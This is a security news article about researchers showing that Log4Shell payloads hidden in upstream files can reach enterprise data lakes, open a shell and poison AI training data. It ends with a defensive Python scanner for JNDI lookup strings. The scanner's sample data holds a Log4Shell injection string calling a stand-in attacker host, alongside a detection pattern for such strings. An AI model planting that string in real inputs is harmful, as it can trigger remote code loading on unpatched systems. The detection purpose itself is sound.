Log4Shell exploit threatens enterprise data lakes, AI poisoning
Enterprise data lakes are filling up as organizations increasingly embrace artificial intelligence (AI) and machine learning, but these repositories are open to exploitation via Log4Shell, the vulnerability in the Java Log4j library, researchers have found.
Generally, organizations focus on ingesting as many data points as they can for training an AI model or algorithm, with an eye toward privacy. All too often, though, they skip hardening the security of the data lakes themselves.
According to research from Zectonal, the Log4Shell bug can be triggered once a malicious payload is ingested into a target data lake or data repository via a data pipeline, bypassing conventional safeguards such as application firewalls and traditional scanning devices.
As with the original attacks targeting the ubiquitous Java Log4j library, exploitation requires only a single string of text. An attacker could simply embed the string within a malicious big-data file payload to open up a shell inside the data lake, and from there can initiate a data-poisoning attack, researchers say. And, since the big-data file carrying the poison payload is often encrypted or compressed, the difficulty of detection is much greater.
“The simplicity of the Log4jShell exploit is what makes it so nefarious,” says David Hirko, founder at Zectonal. “This particular attack vector is difficult to monitor and identify as a threat due to the fact that it blends in with normal operations of data pipelines, big-data distributed systems, and machine-learning training algorithms.”
Leveraging RCE Exploits to Access Data Lakes
One way to carry out this attack is by targeting vulnerable versions of a no-code, open source extract-transform-load (ETL) software application, one of the most popular tools for populating data lakes. An attacker could access the ETL service running in a private subnet from the public Internet via a known remote code execution (RCE) exploit, researchers explain in the report.
The Zectonal team put together a working proof-of-concept (PoC) exploit that used this vector, successfully gaining remote access to subnet IP addresses that were part of a virtual private cloud hosted by a public cloud provider.
While the RCE issue in the ETL software was patched last year, the components have been downloaded millions of times, and it appears that security teams have lagged in applying the fix. The Zectonal team was successful in “triggering an RCE exploit for multiple unpatched releases of the ETL software that spanned a two-year period,” according to the report, shared with Dark Reading prior to publication.
“This attack vector isn’t as simple as just kind of sending a text string to a Web server,” Hirko says, noting the need to penetrate the data supply chain. “An attacker needs to compromise a file somewhere upstream and then have it be flowed into the target data lake. Say you were considering weather data — you might be able to manipulate a file from a weather sensor so that it contained this particular string.”
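To make the idea of a poisoned upstream file concrete, here is a minimal defensive sketch of a pre-ingestion check that looks for a JNDI lookup string in a plain or gzip-compressed text file. It is not drawn from the Zectonal report: the function names, the sample sensor records, and the regular expression are all illustrative assumptions, and a simple pattern like this one would miss obfuscated or encrypted payloads.

```python
import gzip
import io
import re

# Assumption: a deliberately simple pattern for JNDI lookup strings.
# Obfuscated variants (for example, nested lookups) will not match.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def open_maybe_gzip(raw: bytes) -> io.StringIO:
    """Return a text stream, decompressing first if the bytes are gzip data."""
    if raw[:2] == b"\x1f\x8b":  # gzip magic bytes
        raw = gzip.decompress(raw)
    return io.StringIO(raw.decode("utf-8", errors="replace"))


def find_suspicious_lines(raw: bytes) -> list[tuple[int, str]]:
    """Return (line_number, line) pairs that contain a JNDI lookup string."""
    hits = []
    for number, line in enumerate(open_maybe_gzip(raw), start=1):
        if JNDI_PATTERN.search(line):
            hits.append((number, line.rstrip("\n")))
    return hits


if __name__ == "__main__":
    # Hypothetical sensor file with one tampered record.
    sample = (
        "station,temp_c\n"
        "KJFK,21.5\n"
        "KLAX,${jndi:ldap://attacker.example/a}\n"
    ).encode("utf-8")

    # The same check works on the raw file and on a gzip-compressed copy.
    print(find_suspicious_lines(sample))
    print(find_suspicious_lines(gzip.compress(sample)))
```

A check of this kind would sit in the pipeline before data reaches any component that logs field values through Log4j. It is a complement to patching the vulnerable library, not a substitute for it.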
To read the complete article, visit Dark Reading.